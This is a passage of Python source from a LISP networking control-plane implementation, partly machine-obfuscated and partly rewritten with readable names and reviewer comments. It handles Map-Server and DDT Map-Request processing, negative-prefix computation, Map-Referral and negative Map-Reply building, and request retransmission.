  if 26 - 26: I1Ii111 + Oo0Ooo + II111iiii % OoOoOO00 % OOooOOo
  if 40 - 40: I1ii11iIi11i + i1IIi
  if 9 - 9: OOooOOo
  if 74 - 74: OoOoOO00 - OOooOOo % OoOoOO00
  # A matched policy may override the record TTL, force a drop, or
  # replace the RLOC set with a policy-built one.
  if ( iiII1iI ) :
   if ( iiII1iI . set_record_ttl ) :
    oo0OOoOO0 = iiII1iI . set_record_ttl
    lprint ( "Policy set-record-ttl to {}" . format ( oo0OOoOO0 ) )
   if 82 - 82: I11i % IiII + Oo0Ooo + iIii1I11I1II1 - I11i - I1IiiI
   if ( iiII1iI . set_action == "drop" ) :
    lprint ( "Policy set-action drop, send negative Map-Reply" )
    Ii1II1I = LISP_POLICY_DENIED_ACTION
    iio0OOoO0 = [ ]
   else :
    OooO0ooO0o0OO = iiII1iI . set_policy_map_reply ( )
    if ( OooO0ooO0o0OO ) : iio0OOoO0 = [ OooO0ooO0o0OO ]
  if 65 - 65: IiII / O0 * II111iiii + oO0o
  if 52 - 52: o0oOOo0O0Ooo - OoOoOO00 * II111iiii / OoooooooOO
  if 44 - 44: OOooOOo - oO0o + o0oOOo0O0Ooo - i1IIi % o0oOOo0O0Ooo
  if ( O0OOO0oO0OO0 ) :
   lprint ( "Implied drop action, send negative Map-Reply" )
   Ii1II1I = LISP_POLICY_DENIED_ACTION
   iio0OOoO0 = [ ]
  if 79 - 79: iII111i . iIii1I11I1II1
  if 42 - 42: i11iIiiIii / IiII . O0 / OOooOOo . iII111i * i1IIi
  II1iiIiii1iI = O0oiiii1i1i11I . echo_nonce_capable
  if 83 - 83: iIii1I11I1II1 . II111iiii * Oo0Ooo . I1IiiI - I1IiiI - iIii1I11I1II1
  if 29 - 29: Oo0Ooo
  if 35 - 35: OoOoOO00 + II111iiii
  if 46 - 46: O0 / I1ii11iIi11i + OOooOOo - I1Ii111 + I1IiiI - ooOoO0o
  # On signature failure, answer with an auth-failure action and an
  # empty RLOC set for the requested (not site) EID/group.
  if ( II1i1iI ) :
   O0Oo00O = O0oiiii1i1i11I . eid
   OoOOo0O = O0oiiii1i1i11I . group
  else :
   O0Oo00O = I111o0oooO00o0
   OoOOo0O = oOoooOOO0o0
   Ii1II1I = LISP_AUTH_FAILURE_ACTION
   iio0OOoO0 = [ ]
  if 5 - 5: oO0o
  if 59 - 59: iII111i
  if 74 - 74: IiII
  if 94 - 94: I11i + OoooooooOO
  if 20 - 20: o0oOOo0O0Ooo % o0oOOo0O0Ooo . iIii1I11I1II1 + OoOoOO00 * OoO0O00
  if 57 - 57: i11iIiiIii * i11iIiiIii % I1Ii111 - iII111i * O0 - Ii1I
  packet = lisp_build_map_reply ( O0Oo00O , OoOOo0O , iio0OOoO0 ,
   OO00OO , Ii1II1I , oo0OOoOO0 , False , None , II1iiIiii1iI , False )
  if 63 - 63: IiII % OoooooooOO * OoOoOO00 * iIii1I11I1II1 . iII111i % oO0o
  if ( OooOooOO0000 ) :
   lisp_process_pubsub ( lisp_sockets , packet , O0Oo00O , O00o00O0OO0 ,
    mr_sport , OO00OO , oo0OOoOO0 , oOo0 )
  else :
   lisp_send_map_reply ( lisp_sockets , packet , O00o00O0OO0 , mr_sport )
  if 58 - 58: I11i * iII111i + I11i % OoO0O00
  if 19 - 19: Oo0Ooo
  return ( [ O0oiiii1i1i11I . eid , O0oiiii1i1i11I . group , LISP_DDT_ACTION_MS_ACK ] )
 if 43 - 43: oO0o % ooOoO0o
 if 36 - 36: I11i / I1IiiI + O0 % II111iiii
 if 24 - 24: I1Ii111 / o0oOOo0O0Ooo - OOooOOo / IiII
 if 7 - 7: OoooooooOO - i11iIiiIii * i11iIiiIii / oO0o * i1IIi % OoooooooOO
 if 6 - 6: I1ii11iIi11i * i11iIiiIii % i11iIiiIii / I1Ii111
 # Non-proxy path: forward the Map-Request to one of the site's
 # registered ETRs.  With no registered RLOCs we just ack.
 i1ii1I = len ( O0oiiii1i1i11I . registered_rlocs )
 if ( i1ii1I == 0 ) :
  lprint ( "Requested EID {} found site '{}' with EID-prefix {} with " + "no registered RLOCs" . format ( green ( iiI1Ii1I , False ) , O0oooOO0O ,
  # oO0o . OoOoOO00
  green ( IiI1ii1 , False ) ) )
  return ( [ O0oiiii1i1i11I . eid , O0oiiii1i1i11I . group , LISP_DDT_ACTION_MS_ACK ] )
 if 10 - 10: I1IiiI / I1Ii111 % IiII . OoOoOO00
 if 65 - 65: II111iiii + OoO0O00 + OoO0O00
 if 48 - 48: I1ii11iIi11i / iIii1I11I1II1
 if 47 - 47: I1Ii111
 if 41 - 41: IiII
 # Hash source-EID (or target-EID when source is null) over the RLOC
 # count to spread forwarded Map-Requests across the site's ETRs.
 i1iiIiiiiIi = map_request . target_eid if map_request . source_eid . is_null ( ) else map_request . source_eid
 if 26 - 26: I1ii11iIi11i - OoOoOO00 + o0oOOo0O0Ooo * IiII - IiII - iII111i
 IiI1I1i1 = map_request . target_eid . hash_address ( i1iiIiiiiIi )
 IiI1I1i1 %= i1ii1I
 iI1IIiIiIiII = O0oiiii1i1i11I . registered_rlocs [ IiI1I1i1 ]
 if 57 - 57: OOooOOo / II111iiii . Ii1I / I1Ii111 . OoooooooOO
 if ( iI1IIiIiIiII . rloc . is_null ( ) ) :
  lprint ( ( "Suppress forwarding Map-Request for EID {} at site '{}' " + "EID-prefix {}, no RLOC address" ) . format ( green ( iiI1Ii1I , False ) ,
  # I11i % IiII
  O0oooOO0O , green ( IiI1ii1 , False ) ) )
 else :
  lprint ( ( "Forwarding Map-Request for EID {} to ETR {} at site '{}' " + "EID-prefix {}" ) . format ( green ( iiI1Ii1I , False ) ,
  # O0 / II111iiii . Oo0Ooo / Oo0Ooo * II111iiii
  red ( iI1IIiIiIiII . rloc . print_address ( ) , False ) , O0oooOO0O ,
  green ( IiI1ii1 , False ) ) )
  if 22 - 22: Ii1I
  if 81 - 81: iIii1I11I1II1 . ooOoO0o % I11i
  if 64 - 64: I1Ii111 . Oo0Ooo * o0oOOo0O0Ooo
  if 32 - 32: oO0o . I1Ii111 * I1Ii111
  # Re-encapsulate the original Map-Request in an ECM toward the ETR.
  lisp_send_ecm ( lisp_sockets , packet , map_request . source_eid , mr_sport ,
   map_request . target_eid , iI1IIiIiIiII . rloc , to_etr = True )
 if 32 - 32: I1Ii111 . Ii1I / i1IIi
 return ( [ O0oiiii1i1i11I . eid , O0oiiii1i1i11I . group , LISP_DDT_ACTION_MS_ACK ] )
if 2 - 2: OOooOOo * ooOoO0o / I11i + OoO0O00
if 96 - 96: II111iiii * OoO0O00 + I1ii11iIi11i + OoOoOO00 / II111iiii . iII111i
if 64 - 64: iII111i % Oo0Ooo
if 79 - 79: IiII + iII111i / II111iiii . i1IIi + iIii1I11I1II1
if 32 - 32: Ii1I * iII111i
if 52 - 52: I11i
if 100 - 100: Oo0Ooo % Oo0Ooo % I1ii11iIi11i
def lisp_ddt_process_map_request ( lisp_sockets , map_request , ecm_source , port ) :
 #
 # DDT-node (or Map-Server acting as DDT) processing of a Map-Request:
 # choose a Map-Referral action and TTL based on the delegation cache
 # (or, on a Map-Server, the site registration state), then build and
 # send the Map-Referral back toward the requestor.
 # NOTE(review): identifiers are machine-obfuscated; comments inferred
 # from the visible calls and LISP_DDT_* constants.
 #
 if 33 - 33: I1Ii111 . I1Ii111 * i1IIi
 if 22 - 22: I1ii11iIi11i . II111iiii + iIii1I11I1II1 / OoooooooOO . ooOoO0o
 if 13 - 13: II111iiii
 if 36 - 36: iII111i - oO0o / Oo0Ooo / O0 . OoO0O00 . i1IIi
 I111o0oooO00o0 = map_request . target_eid
 oOoooOOO0o0 = map_request . target_group
 iiI1Ii1I = lisp_print_eid_tuple ( I111o0oooO00o0 , oOoooOOO0o0 )
 OO00OO = map_request . nonce
 Ii1II1I = LISP_DDT_ACTION_NULL
 if 19 - 19: O0 . OoooooooOO % iIii1I11I1II1 - Ii1I . Ii1I + I1IiiI
 if 98 - 98: oO0o . Oo0Ooo
 if 9 - 9: I1Ii111 % IiII - i11iIiiIii - OOooOOo % iII111i % OoooooooOO
 if 6 - 6: i1IIi - II111iiii * OoOoOO00 + oO0o
 if 6 - 6: I1IiiI - ooOoO0o + I1IiiI + OoO0O00 - i11iIiiIii % ooOoO0o
 # Map-Server case: consult the site cache.  Registered site -> MS_ACK;
 # unregistered -> compute the least-specific negative prefix, MS_NOT_REG.
 oo0O0O = None
 if ( lisp_i_am_ms ) :
  O0oiiii1i1i11I = lisp_site_eid_lookup ( I111o0oooO00o0 , oOoooOOO0o0 , False )
  if ( O0oiiii1i1i11I == None ) : return
  if 34 - 34: OoO0O00 % I1ii11iIi11i
  if ( O0oiiii1i1i11I . registered ) :
   Ii1II1I = LISP_DDT_ACTION_MS_ACK
   oo0OOoOO0 = 1440
  else :
   I111o0oooO00o0 , oOoooOOO0o0 , Ii1II1I = lisp_ms_compute_neg_prefix ( I111o0oooO00o0 , oOoooOOO0o0 )
   Ii1II1I = LISP_DDT_ACTION_MS_NOT_REG
   oo0OOoOO0 = 1
  if 80 - 80: IiII - I1Ii111 / iIii1I11I1II1
 else :
  # Pure DDT-node case: consult the delegation cache.
  oo0O0O = lisp_ddt_cache_lookup ( I111o0oooO00o0 , oOoooOOO0o0 , False )
  if ( oo0O0O == None ) :
   # No entry at all: we are not authoritative for this EID.
   Ii1II1I = LISP_DDT_ACTION_NOT_AUTH
   oo0OOoOO0 = 0
   lprint ( "DDT delegation entry not found for EID {}" . format ( green ( iiI1Ii1I , False ) ) )
   if 45 - 45: oO0o + iII111i / o0oOOo0O0Ooo + I11i % OoOoOO00
  elif ( oo0O0O . is_auth_prefix ( ) ) :
   if 6 - 6: OoooooooOO + i1IIi % IiII - OoO0O00 * iIii1I11I1II1
   if 36 - 36: I11i / o0oOOo0O0Ooo + IiII * o0oOOo0O0Ooo + Ii1I - I11i
   if 70 - 70: oO0o * ooOoO0o / ooOoO0o - Ii1I * Ii1I % OOooOOo
   if 91 - 91: OoO0O00 - OoO0O00 % O0
   # Only the covering auth-prefix matched: a delegation hole.
   # Compute the widest covering prefixes with no delegations.
   Ii1II1I = LISP_DDT_ACTION_DELEGATION_HOLE
   oo0OOoOO0 = 15
   o0oO0OOoOoOO = oo0O0O . print_eid_tuple ( )
   lprint ( ( "DDT delegation entry not found but auth-prefix {} " + "found for EID {}" ) . format ( o0oO0OOoOoOO ,
   # Ii1I - ooOoO0o / Ii1I - oO0o - iII111i
   green ( iiI1Ii1I , False ) ) )
   if 10 - 10: I1Ii111 . Oo0Ooo . Ii1I . i11iIiiIii / OoooooooOO
   if ( oOoooOOO0o0 . is_null ( ) ) :
    I111o0oooO00o0 = lisp_ddt_compute_neg_prefix ( I111o0oooO00o0 , oo0O0O ,
     lisp_ddt_cache )
   else :
    oOoooOOO0o0 = lisp_ddt_compute_neg_prefix ( oOoooOOO0o0 , oo0O0O ,
     lisp_ddt_cache )
    I111o0oooO00o0 = lisp_ddt_compute_neg_prefix ( I111o0oooO00o0 , oo0O0O ,
     oo0O0O . source_cache )
   if 58 - 58: I1Ii111 / iII111i / oO0o
   oo0O0O = None
  else :
   o0oO0OOoOoOO = oo0O0O . print_eid_tuple ( )
   lprint ( "DDT delegation entry {} found for EID {}" . format ( o0oO0OOoOoOO , green ( iiI1Ii1I , False ) ) )
   if 69 - 69: i11iIiiIii / O0 - OoooooooOO + I1ii11iIi11i . OoO0O00
   oo0OOoOO0 = 1440
 if 19 - 19: I1IiiI / iII111i . OOooOOo / oO0o + I1ii11iIi11i + OOooOOo
 if 1 - 1: iIii1I11I1II1
 if 59 - 59: ooOoO0o % I1IiiI + i1IIi * I1Ii111 % o0oOOo0O0Ooo * II111iiii
 if 22 - 22: OoOoOO00 * O0 + OoOoOO00 / iIii1I11I1II1 + oO0o + IiII
 if 69 - 69: iIii1I11I1II1 . I1Ii111 * iII111i
 if 6 - 6: I11i - IiII - I11i - II111iiii
 # Build and send the Map-Referral.  The upper 32 nonce bits are checked
 # against a magic value (presumably marking internal/test requests —
 # TODO confirm); otherwise reply to the well-known control port.
 ii1i1II = lisp_build_map_referral ( I111o0oooO00o0 , oOoooOOO0o0 , oo0O0O , Ii1II1I , oo0OOoOO0 , OO00OO )
 OO00OO = map_request . nonce >> 32
 if ( map_request . nonce != 0 and OO00OO != 0xdfdf0e1d ) : port = LISP_CTRL_PORT
 lisp_send_map_referral ( lisp_sockets , ii1i1II , ecm_source , port )
 return
if 72 - 72: i1IIi / OOooOOo . Oo0Ooo . oO0o
if 72 - 72: o0oOOo0O0Ooo % iIii1I11I1II1
if 74 - 74: Oo0Ooo % OOooOOo + i11iIiiIii
if 17 - 17: OoOoOO00 . I1IiiI
if 30 - 30: i1IIi * OoOoOO00 * I11i . O0
if 45 - 45: iII111i
if 99 - 99: o0oOOo0O0Ooo % ooOoO0o % i11iIiiIii
if 32 - 32: IiII - Ii1I
if 44 - 44: OoooooooOO . oO0o
if 30 - 30: I1Ii111 % IiII / II111iiii
if 68 - 68: oO0o / O0 / OOooOOo
if 3 - 3: o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 17 - 17: OoO0O00 * i1IIi
def lisp_find_negative_mask_len ( eid , entry_prefix , neg_prefix ) :
 #
 # Compare eid with entry_prefix via hash_address() and locate the
 # most-significant set bit of the result; that bit's index is the mask
 # length needed to separate the two.  neg_prefix.mask_len only ever
 # grows — it keeps the longest mask required across repeated calls.
 #
 diff_bits = eid . hash_address ( entry_prefix )
 address_bits = eid . addr_length ( ) * 8

 bit_index = 0
 for bit_index in range ( address_bits ) :
  probe = 1 << ( address_bits - bit_index - 1 )
  if ( diff_bits & probe ) : break

 if ( bit_index > neg_prefix . mask_len ) : neg_prefix . mask_len = bit_index
 return
if 44 - 44: I1IiiI - Oo0Ooo / OoOoOO00 . Ii1I - I1IiiI + O0
if 90 - 90: Ii1I + OoooooooOO . i11iIiiIii / Oo0Ooo % OoOoOO00 / IiII
if 45 - 45: OoooooooOO / oO0o . I1ii11iIi11i + OOooOOo
if 54 - 54: Ii1I - o0oOOo0O0Ooo + OoOoOO00 / OoooooooOO
if 61 - 61: I11i / IiII % OoooooooOO - i11iIiiIii * i1IIi % o0oOOo0O0Ooo
if 67 - 67: o0oOOo0O0Ooo - Ii1I
if 29 - 29: OoOoOO00 . I1ii11iIi11i
if 24 - 24: OOooOOo + i1IIi . I11i . OoOoOO00 + OoooooooOO
if 98 - 98: ooOoO0o + i1IIi / I1IiiI
if 1 - 1: IiII . OoooooooOO + II111iiii
def lisp_neg_prefix_walk ( entry , parms ) :
 #
 # Cache-walk callback used when computing a negative (least-specific)
 # prefix.  parms is (eid, auth-prefix-or-None, negative-prefix); for
 # each qualifying cache entry the negative prefix's mask length is
 # widened via lisp_find_negative_mask_len().  Always returns
 # [True, parms] so the walk continues over the whole cache.
 #
 eid , auth_prefix , neg_prefix = parms

 if ( auth_prefix == None ) :
  # No auth-prefix: only entries in the same instance-id and AFI count.
  if ( entry . eid . instance_id != eid . instance_id ) :
   return ( [ True , parms ] )
  if ( entry . eid . afi != eid . afi ) : return ( [ True , parms ] )
 else :
  # Auth-prefix supplied: only entries underneath it count.
  if ( entry . eid . is_more_specific ( auth_prefix ) == False ) :
   return ( [ True , parms ] )

 lisp_find_negative_mask_len ( eid , entry . eid , neg_prefix )
 return ( [ True , parms ] )
if 80 - 80: IiII / OoooooooOO
if 69 - 69: OoOoOO00 + IiII
if 18 - 18: O0 / I11i
if 10 - 10: I1Ii111 * i1IIi
if 48 - 48: Oo0Ooo % i1IIi / iII111i . O0
if 27 - 27: I11i + iIii1I11I1II1 - i11iIiiIii
if 81 - 81: I11i + oO0o * iIii1I11I1II1 * IiII
if 7 - 7: I11i - I1IiiI . iII111i + O0 / iIii1I11I1II1 - I1Ii111
def lisp_ddt_compute_neg_prefix ( eid , ddt_entry , cache ) :
 #
 # Compute the least-specific prefix covering 'eid' that does not
 # overlap any entry in 'cache', bounded by ddt_entry's auth-prefix.
 # Non-binary EIDs (e.g. distinguished-names) cannot be aggregated,
 # so they are returned unchanged.
 #
 if ( eid . is_binary ( ) == False ) : return ( eid )

 # Start from a copy of the EID with mask length 0; the cache walk
 # widens the mask just enough to exclude every sibling entry.
 neg_prefix = lisp_address ( eid . afi , "" , 0 , 0 )
 neg_prefix . copy_address ( eid )
 neg_prefix . mask_len = 0

 auth_prefix_str = ddt_entry . print_eid_tuple ( )
 auth_prefix = ddt_entry . eid

 eid , auth_prefix , neg_prefix = cache . walk_cache ( lisp_neg_prefix_walk ,
  ( eid , auth_prefix , neg_prefix ) )

 # Zero the host bits beyond the computed mask length.
 neg_prefix . mask_address ( neg_prefix . mask_len )

 lprint ( ( "Least specific prefix computed from ddt-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
  auth_prefix_str , neg_prefix . print_prefix ( ) ) )
 return ( neg_prefix )
if 16 - 16: Ii1I / Ii1I
if 95 - 95: I11i % OoO0O00
if 69 - 69: OoOoOO00 % IiII / II111iiii
if 82 - 82: I1Ii111 + O0 . I1IiiI / I1ii11iIi11i % II111iiii
if 46 - 46: O0 - I1IiiI + OoooooooOO / OoOoOO00
if 76 - 76: I1ii11iIi11i - ooOoO0o % OoooooooOO / Oo0Ooo % IiII / ooOoO0o
if 57 - 57: O0
if 23 - 23: OoO0O00 / II111iiii . I1ii11iIi11i . O0
def lisp_ms_compute_neg_prefix ( eid , group ) :
 #
 # Map-Server computation of the negative (least-specific uncovered)
 # EID and group prefixes for a not-registered lookup.  Walks the DDT
 # cache for the auth-prefix and the site cache for neighbors, returning
 # [neg-eid-prefix, neg-group-prefix, ddt-action].
 # NOTE(review): identifiers are machine-obfuscated; comments inferred
 # from the visible calls.
 #
 # Start both negative prefixes as mask-length-0 copies; the cache walks
 # below widen the masks via lisp_neg_prefix_walk().
 iiiI1i = lisp_address ( eid . afi , "" , 0 , 0 )
 iiiI1i . copy_address ( eid )
 iiiI1i . mask_len = 0
 ii1i1I1i = lisp_address ( group . afi , "" , 0 , 0 )
 ii1i1I1i . copy_address ( group )
 ii1i1I1i . mask_len = 0
 iiIi11i1ii1I = None
 if 95 - 95: i1IIi + II111iiii . iIii1I11I1II1 . OoooooooOO + o0oOOo0O0Ooo / iIii1I11I1II1
 if 40 - 40: OoO0O00 / O0
 if 60 - 60: iIii1I11I1II1 / Oo0Ooo / oO0o + iII111i
 if 66 - 66: iIii1I11I1II1 . O0 * IiII . ooOoO0o + i1IIi
 if 83 - 83: o0oOOo0O0Ooo / II111iiii + I1IiiI - iII111i + OoO0O00
 # Unicast (null group): key the DDT lookup on the EID and walk the
 # site cache.  No DDT entry at all means we are not authoritative —
 # return host-mask negatives with NOT_AUTH.
 if ( group . is_null ( ) ) :
  oo0O0O = lisp_ddt_cache . lookup_cache ( eid , False )
  if ( oo0O0O == None ) :
   iiiI1i . mask_len = iiiI1i . host_mask_len ( )
   ii1i1I1i . mask_len = ii1i1I1i . host_mask_len ( )
   return ( [ iiiI1i , ii1i1I1i , LISP_DDT_ACTION_NOT_AUTH ] )
  if 67 - 67: I1Ii111 - OoOoOO00 . i11iIiiIii - I1Ii111 . i11iIiiIii
  i1I11I1I1I = lisp_sites_by_eid
  if ( oo0O0O . is_auth_prefix ( ) ) : iiIi11i1ii1I = oo0O0O . eid
 else :
  # Multicast: key the DDT lookup on the group, compute the group's
  # negative prefix from the site cache first, then walk the DDT
  # entry's source cache for the source-EID below.
  oo0O0O = lisp_ddt_cache . lookup_cache ( group , False )
  if ( oo0O0O == None ) :
   iiiI1i . mask_len = iiiI1i . host_mask_len ( )
   ii1i1I1i . mask_len = ii1i1I1i . host_mask_len ( )
   return ( [ iiiI1i , ii1i1I1i , LISP_DDT_ACTION_NOT_AUTH ] )
  if 36 - 36: O0 - II111iiii
  if ( oo0O0O . is_auth_prefix ( ) ) : iiIi11i1ii1I = oo0O0O . group
  if 97 - 97: I1IiiI
  group , iiIi11i1ii1I , ii1i1I1i = lisp_sites_by_eid . walk_cache ( lisp_neg_prefix_walk , ( group , iiIi11i1ii1I , ii1i1I1i ) )
  if 87 - 87: I11i + iIii1I11I1II1
  if 91 - 91: oO0o
  ii1i1I1i . mask_address ( ii1i1I1i . mask_len )
  if 58 - 58: i11iIiiIii / Ii1I - OoooooooOO
  lprint ( ( "Least specific prefix computed from site-cache for " + "group EID {} using auth-prefix {} is {}" ) . format ( group . print_address ( ) , iiIi11i1ii1I . print_prefix ( ) if ( iiIi11i1ii1I != None ) else "'not found'" ,
  # IiII - i1IIi
  # I1IiiI * I1IiiI - i11iIiiIii % Oo0Ooo . i11iIiiIii
  # Ii1I
  ii1i1I1i . print_prefix ( ) ) )
  if 2 - 2: I1IiiI % I11i * II111iiii
  i1I11I1I1I = oo0O0O . source_cache
 if 82 - 82: I1Ii111 . OoO0O00 * II111iiii
 if 99 - 99: iIii1I11I1II1 / iII111i % i1IIi - II111iiii / OoO0O00
 if 33 - 33: OoooooooOO / i1IIi . Ii1I
 if 96 - 96: OoOoOO00 / Oo0Ooo . II111iiii / ooOoO0o
 if 56 - 56: IiII - ooOoO0o % oO0o / Oo0Ooo * oO0o % O0
 # Auth-prefix found -> the miss is a delegation hole; otherwise we are
 # simply not authoritative for this EID.
 Ii1II1I = LISP_DDT_ACTION_DELEGATION_HOLE if ( iiIi11i1ii1I != None ) else LISP_DDT_ACTION_NOT_AUTH
 if 71 - 71: iII111i / II111iiii - II111iiii / I1IiiI
 if 24 - 24: O0 . I1IiiI + IiII . IiII
 if 53 - 53: II111iiii + Ii1I * o0oOOo0O0Ooo
 if 47 - 47: Ii1I % OOooOOo . Oo0Ooo
 if 94 - 94: Ii1I - iIii1I11I1II1 + I1IiiI - iIii1I11I1II1 . o0oOOo0O0Ooo
 if 3 - 3: O0 / I11i + OoOoOO00 % IiII / i11iIiiIii
 # Walk whichever cache i1I11I1I1I now refers to (site cache for
 # unicast, the DDT entry's source cache for multicast) for the EID.
 eid , iiIi11i1ii1I , iiiI1i = i1I11I1I1I . walk_cache ( lisp_neg_prefix_walk ,
  ( eid , iiIi11i1ii1I , iiiI1i ) )
 if 25 - 25: II111iiii / I1ii11iIi11i % iIii1I11I1II1
 if 69 - 69: IiII
 if 36 - 36: I1IiiI / oO0o
 if 72 - 72: i1IIi - I1ii11iIi11i . OOooOOo + I1Ii111 - ooOoO0o
 # Zero host bits beyond the computed mask length.
 iiiI1i . mask_address ( iiiI1i . mask_len )
 if 69 - 69: o0oOOo0O0Ooo * I1IiiI - I11i
 lprint ( ( "Least specific prefix computed from site-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
 # I1IiiI
 # O0 % I1ii11iIi11i + I1IiiI - i1IIi . i1IIi * II111iiii
 iiIi11i1ii1I . print_prefix ( ) if ( iiIi11i1ii1I != None ) else "'not found'" , iiiI1i . print_prefix ( ) ) )
 if 64 - 64: I1IiiI * iIii1I11I1II1 % I1Ii111
 if 22 - 22: OoooooooOO + I1Ii111 . o0oOOo0O0Ooo * Oo0Ooo
 return ( [ iiiI1i , ii1i1I1i , Ii1II1I ] )
if 61 - 61: iIii1I11I1II1
if 95 - 95: I1ii11iIi11i + IiII * Ii1I - IiII
if 58 - 58: I1ii11iIi11i - oO0o % I11i * O0
if 43 - 43: OoOoOO00 + O0
if 71 - 71: ooOoO0o * I1IiiI / I1ii11iIi11i
if 8 - 8: I1Ii111 / iIii1I11I1II1
if 29 - 29: i11iIiiIii % i1IIi + oO0o . I1ii11iIi11i
if 51 - 51: OOooOOo + o0oOOo0O0Ooo . OOooOOo
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
    action, eid_prefix, group_prefix):
    # Map-Server side of DDT: build a single-record Map-Referral that
    # answers 'map_request' with the supplied referral 'action' and
    # send it back toward the requesting DDT node.
    eid = map_request.target_eid
    group = map_request.target_group
    nonce = map_request.nonce

    if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440

    # Start with the Map-Referral header.
    map_referral = lisp_map_referral()
    map_referral.record_count = 1
    map_referral.nonce = nonce
    packet = map_referral.encode()
    map_referral.print_map_referral()

    incomplete = False

    # For an unknown site, compute the least-specific negative prefix
    # to return and re-derive the action from it.
    if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
        eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
            group)
        ttl = 15

    # Record TTL (in minutes) depends on the referral action.
    # NOTE(review): 'ttl' is only assigned for the action values handled
    # here; an unexpected action would raise an unbound-local error at
    # the record_ttl assignment below -- confirm callers only pass these.
    if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
    if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
    if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
    if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0

    # Pull the delegation-set for the requested EID from the DDT cache.
    ms_peer = False
    referral_count = 0
    ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
    if (ddt_entry != None):
        referral_count = len(ddt_entry.delegation_set)
        ms_peer = ddt_entry.is_ms_peer_entry()
        ddt_entry.map_referrals_sent += 1

    # Decide whether the referral is flagged ddt-incomplete.
    if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
    if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
        incomplete = (ms_peer == False)

    # Append the single EID-record.
    eid_record = lisp_eid_record()
    eid_record.rloc_count = referral_count
    eid_record.authoritative = True
    eid_record.action = action
    eid_record.ddt_incomplete = incomplete
    eid_record.eid = eid_prefix
    eid_record.group = group_prefix
    eid_record.record_ttl = ttl

    packet += eid_record.encode()
    eid_record.print_record(" ", True)

    # Append one RLOC-record per delegate in the delegation-set.
    if (referral_count != 0):
        for delegate in ddt_entry.delegation_set:
            rloc_record = lisp_rloc_record()
            rloc_record.rloc = delegate.delegate_address
            rloc_record.priority = delegate.priority
            rloc_record.weight = delegate.weight
            rloc_record.mpriority = 255
            rloc_record.mweight = 0
            rloc_record.reach_bit = True
            packet += rloc_record.encode()
            rloc_record.print_record(" ")

    # For a non-zero nonce, send the referral to the well-known LISP
    # control port rather than the supplied source port.
    if (map_request.nonce != 0): port = LISP_CTRL_PORT
    lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
    return
if 66 - 66: I1IiiI + I11i
if 58 - 58: I1ii11iIi11i
if 7 - 7: oO0o - I11i
if 59 - 59: Ii1I / o0oOOo0O0Ooo / OoO0O00 + IiII + i11iIiiIii
if 64 - 64: o0oOOo0O0Ooo * IiII * IiII * iII111i % i11iIiiIii
if 22 - 22: I1ii11iIi11i * II111iiii - OOooOOo % i11iIiiIii
if 10 - 10: OOooOOo / I1ii11iIi11i
if 21 - 21: OoO0O00 % Oo0Ooo . o0oOOo0O0Ooo + IiII
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
    xtr_id, pubsub):
    # Build and transmit a negative Map-Reply (no RLOCs) for an EID we
    # have no mapping for, telling the ITR how to treat packets that
    # match this prefix.
    eid_str = lisp_print_eid_tuple(eid, group)
    lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
        format(eid_str, lisp_hex_string(nonce),
        red(dest.print_address(), False)))

    # Unicast prefixes natively forward; multicast prefixes drop.
    if (group.is_null()):
        reply_action = LISP_NATIVE_FORWARD_ACTION
    else:
        reply_action = LISP_DROP_ACTION

    # Crypto-hash EIDs get a send-map-request action instead.
    if (lisp_get_eid_hash(eid) != None):
        reply_action = LISP_SEND_MAP_REQUEST_ACTION

    reply = lisp_build_map_reply(eid, group, [], nonce, reply_action, ttl,
        False, None, False, False)

    # Either record pubsub subscription state or just send the reply.
    if (pubsub == False):
        lisp_send_map_reply(sockets, reply, dest, port)
    else:
        lisp_process_pubsub(sockets, reply, eid, dest, port, nonce, ttl,
            xtr_id)
    return
if 83 - 83: II111iiii . OOooOOo
if 88 - 88: O0
if 12 - 12: Ii1I % OOooOOo % Oo0Ooo * I1Ii111
if 96 - 96: iII111i + ooOoO0o
if 100 - 100: OOooOOo . ooOoO0o + Ii1I + Ii1I
if 70 - 70: ooOoO0o . iIii1I11I1II1 / oO0o
if 18 - 18: Ii1I / OoooooooOO % i1IIi * o0oOOo0O0Ooo
def lisp_retransmit_ddt_map_request(mr):
    # Retransmit-timer handler for a queued DDT Map-Request 'mr'.
    # Counts the non-response against the referral-node we last queried,
    # gives up after the retry limit, otherwise resends and re-arms the
    # timer.
    source_str = mr.mr_source.print_address()
    eid_str = mr.print_eid_tuple()
    nonce = mr.nonce

    # Charge a no-response to the referral-node the last request went to.
    if (mr.last_request_sent_to):
        last_addr = mr.last_request_sent_to.print_address()
        referral = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
            mr.last_cached_prefix[1], True)
        # Fix: dict.has_key() was removed in Python 3; the "in" operator
        # is equivalent on Python 2 as well.
        if (referral and last_addr in referral.referral_set):
            referral.referral_set[last_addr].no_responses += 1

    # Retry limit reached -- drop the queued request.
    if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
        lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}".format(
            green(eid_str, False), lisp_hex_string(nonce)))
        mr.dequeue_map_request()
        return

    mr.retry_count += 1

    s = green(source_str, False)
    e = green(eid_str, False)
    lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}".format(
        bold("Map-Request", False), "P" if mr.from_pitr else "",
        red(mr.itr.print_address(), False), s, e,
        lisp_hex_string(nonce)))

    lisp_send_ddt_map_request(mr, False)

    # Re-arm the retransmission timer for the next interval.
    mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
